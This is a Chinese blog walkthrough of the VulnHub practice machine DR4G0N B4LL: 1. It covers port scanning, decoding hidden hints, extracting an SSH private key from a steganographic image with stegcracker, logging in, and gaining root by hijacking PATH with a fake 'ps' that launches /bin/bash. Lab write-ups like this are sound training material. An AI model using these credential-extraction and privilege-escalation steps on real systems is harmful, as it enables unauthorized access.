Vulnhub渗透测试 DR4G0N B4LL: 1

已于 2022-04-04 14:47:30 修改
阅读量3.6k 收藏
点赞数 2
文章标签: 安全 渗透测试
于 2022-01-04 16:08:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LvHLong/article/details/122303601
版权

项目地址:Dr4g0n b4ll: 1 ~ VulnHub

前期信息收集

使用Nmap 进行主机发现  

 使用Nmap 进行端口扫描

目标开启ssh(22)、http(80)

在页面源代码中发现提示

多次base解码后为 DRAGON BALL

使用Dirscan目录扫描 发现robots.txt

base64解码为 you find the hidden dir (找到隐藏的目录)

根据前面源码提示 访问http://192.168.234.157/DRAGON BALL/

secret.txt 里逐个测试发现都无效;直接进入Vulnhub目录

有张图片和login.html

 发现用户名 xmen

将图片下载到Kali

wget http://192.168.234.157/DRAGON%20BALL/Vulnhub/aj.jpg

图片经过尝试发现为steg隐写,使用 steghide 但是发现需要密码

steghide extract -sf aj.jpg

 网上收集一波资料发现可以使用 stegcracker 破解密码

stegcracker aj.jpg

 得到 id_rsa 结合前面收集的用户xmen 可以尝试ssh连接

赋予id_rsa 权限

chmod 600 id_rsa

 ssh登录

ssh xmen@192.168.234.157 -i id_rsa

 可以发现一个Flag

提权

尝试SUID提权

find / -perm -u=s -type f 2>/dev/null

 

发现家目录下可疑文件 shell

执行shell文件发现会运行ps

修改 环境变量 提权

cd /tmp                         #cd到可写的目录 一般/tmp可以写临时文件
echo "/bin/bash" > ps           #将"/bin/bash"覆盖到ps命令 这样执行shell 就会有root权限
chmod +x ps                     # 赋予 ps 可执行权限
export PATH=/tmp:$PATH          # 修改ps命令环境变量为我们伪造的ps路径
which ps                        # 查看ps执行路径

 执行shell即可获得Root权限

blalon
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
dr4g0n-开源
07-16
Linux 机器上的其他渗透测试工具
vulnhub靶机 DR4G0N B4LL: 1 渗透笔记
a1176905843的博客
07-12 452
vulnhub靶机 DR4G0N B4LL: 1 渗透笔记前期准备信息搜集合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 渗透笔记) 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown
vulnhub靶机Dr4g0n b4ll :1渗透笔记
m0_64122957的博客
05-17 915
https://note.youdao.com/s/aFd9cC57https://note.youdao.com/s/aFd9cC57
红队打靶:DR4G0N B4LL打靶思路详解(vulnhub
最新发布
Bossfrank的博客
02-28 1112
本文是vulnhub靶机DR4G0N B4LL:1的详细思路与打靶过程。涉及到的知识点有:常规Web渗透思路、使用脚本进行字符串处理、curl批量访问、stegseek图片隐写破解、变量劫持提权等。
Dr4g0n b4ll: 1 ~ VulnHub
小小猪的博客
09-16 438
进入script目录,查看文件,并运行,第一个为运行ps的源码,shell为运行ps命令。nmap命令进行服务端口扫描,发现开放22和80端口。查看id,已经是root用户权限,查看flag文件。删除这个文件,不然会连接不上,ssh密钥进行连接。访问login.html这个网址,发现用户名。进行suid提权,编辑环境变量,运行文件。扫描该网站目录,发现一些文件以及路径。访问该目录,发现一个文本一个文件夹。访问80端口,发现是一个网站。查看保存后的文件,发现是密钥。查看源码,发现一串字符。
靶机:Dr4g0n b4ll: 1
weixin_50339323的博客
08-02 340
靶机信息: 渗透流程: 扫描存活的主机 扫描端口 访问该IP网页 用gobuster扫一下目录 访问一下robots.txt 得到一串base64编码 将其解码 解码后得到信息为:需要找到隐藏的目录 查看源码,一直往下拉会又是一个base64编码 将其多次解码都得DRAGON BALL 想必这个就是隐藏目录 试图访问此目录 查看是否有重要信息 一张图片应该存在隐写 一个登陆页面 将图片下载...
vuln靶场--Dr4g0n-b4ll
bobo_milk的博客
05-13 525
目录 一、信息收集 二、漏洞发现 三、权限提升 总结 一、信息收集 常规的主机发现以及端口扫描,扫描自己所在的网段。 nmap 192.168.216.0/24 ​​​​ nmap -A -v -T4 -p 1-65535 192.168.216.146 可以看到服务器开启了80端口和22ssh的端口以及一些服务器的信息,网站搭建的中间件以及版本等等信息。 二、漏洞发现 访问服务器的80端口 一个...
4G-CAT1 usr-dr154技术资料 通过485发送数据,通过平台下发数据的沟通记录
02-06
通过485发送数据,通过平台下发数据的沟通记录
checkra1n-twrp:TWRP中用于checkra1n的Android自动化应用
05-25
dr一键执行checkra1n用于Android。 要求 根植的Android设备 ARM / ARM64 CPU USB-C转USB-A适配器 TWRP自订复原 支持的iOS / tvOS设备 屏幕截图 特征 引导到TWRP并通过一个按钮执行checkra1n 在App中提供DFU指令 ...
abctodq0.zip_27AE_8DR_abctodq0
07-15
Then perform anto transformation in a rotating referenc
FAQ_DR22_1Operation
03-16
FAQ_DR22_1Operation.pdf 介绍了关于FAQ_DR22_1Operation的详细说明,提供传感器与仪表的技术资料的下载。
vulnhub(De-ICE S1.100, S1.110)
公众号shadow sock7
01-16 1126
学了两个vulnhub上的box De-ICE S1.100 De-ICE S1.110 非常详细的writeup: http://blog.nullmode.com/blog/2013/10/31/de-ice-s1-dot-100-level-1-a-beginners-guide/
VulnHub——DC-3
菜鸟的学习笔记
12-30 163
DC-3 信息搜集 使用nmap进行探测和扫描 已知信息: CMS为Joomla 访问网页,没有多余的提示,表明仅有一个入口点。 搜索后得知访问/modules/mod_login/mod_login.xml文件可以查看版本,发现版本为3.1,并且发现了一个路径。 /administrator/components/com_menus/models/fields,/adminisrtator为后台登陆页面。 漏洞挖掘与利用 1、既然发现是Joomla,那么从github查找相应的工具进行攻击。 找到
VulnHub—DC-7
weixin_39219503的博客
02-02 400
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-7,356/ 题目信息如下 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. W...
VulnHub-XXE
热门推荐
江左盟的博客
11-28 1万+
简介 本以为该靶机是利用XXE获取权限,做的过程中才发现该靶机不已拿权限为目的,该靶机为CTF题,目的在于学习XXE漏洞。 靶机下载地址:https://www.vulnhub.com/entry/xxe-lab-1,254/ 信息收集 使用nmap --min-rate 10000 192.168.142.136 --script=vuln -sV扫描目标主机发现开启80和5355端口,80端口中间件为Apache 2.4.27,存在robots.txt文件,如图: 访问80端口为Apache默认页面,
Vulnhub--Gaara
从不专注的人的博客
06-16 384
目录Vulnhub--Gaara信息收集扫描目标网段扫描端口及服务版本目录扫描漏洞利用hydra破解ssh登陆进行提权查看文件 Vulnhub–Gaara 靶机下载地址:https://www.vulnhub.com/entry/gaara-1,629/ 信息收集 扫描目标网段 我们先使用nmap命令扫描网段 扫描端口及服务版本 然后我们访问80端口,没有发现什么有用的信息 目录扫描 然后我们来进行目录扫描 dir -u http://172.16.58.138/ -w /usr/share/dir
VulnHub_FunBox
qq_45434762的博客
08-29 544
发现目标主机我们使用nmap扫描整个网段sudo nmap 192.168.1.0/24 扫描端口使用Nmap探测目标主机开放的端口,发现目标主机开放了,21,22,80端口sudo n...
1、VulnHub(基础准备)
weixin_43850732的博客
06-24 262
1、vulnhub基础准备扫描靶机IPNmapArp-scanNetdiscover开启简易HTTP服务python方式php方式 扫描靶机IP 默认在导入靶机镜像后是不知道靶机IP地址的,第一步是扫描发现到靶机的IP地址。 Nmap ping 扫描 nmap -sP 192.168.100.1/24 no ping 扫描 nmap -nP 192.168.100.1/24 Arp-scan arp-scan是Kali Linux自带的一款ARP扫描工具。该工具可以进行单一目标扫描,也可以进行批
Vulnhub_Noob
qq_45434762的博客
09-18 1317
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关主机信息Kali:192.168.31.216Noob:192.168.31.192信息收集使用Nmap扫描探测目标主机开放了21、80、55055三个端口nmap -sS -p- 192.168.31...
使用Bigram对测试集中的方言区域DR1的FAKS0的十段文字进行打分。
05-27
好的,为了使用Bigram对测试集中的方言区域DR1的FAKS0的十段文字进行打分,我们可以使用刚才构建的ARPA语言模型。以下是一个Python脚本,可以帮助你完成这个任务: ```python from nltk.lm.models import Language...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值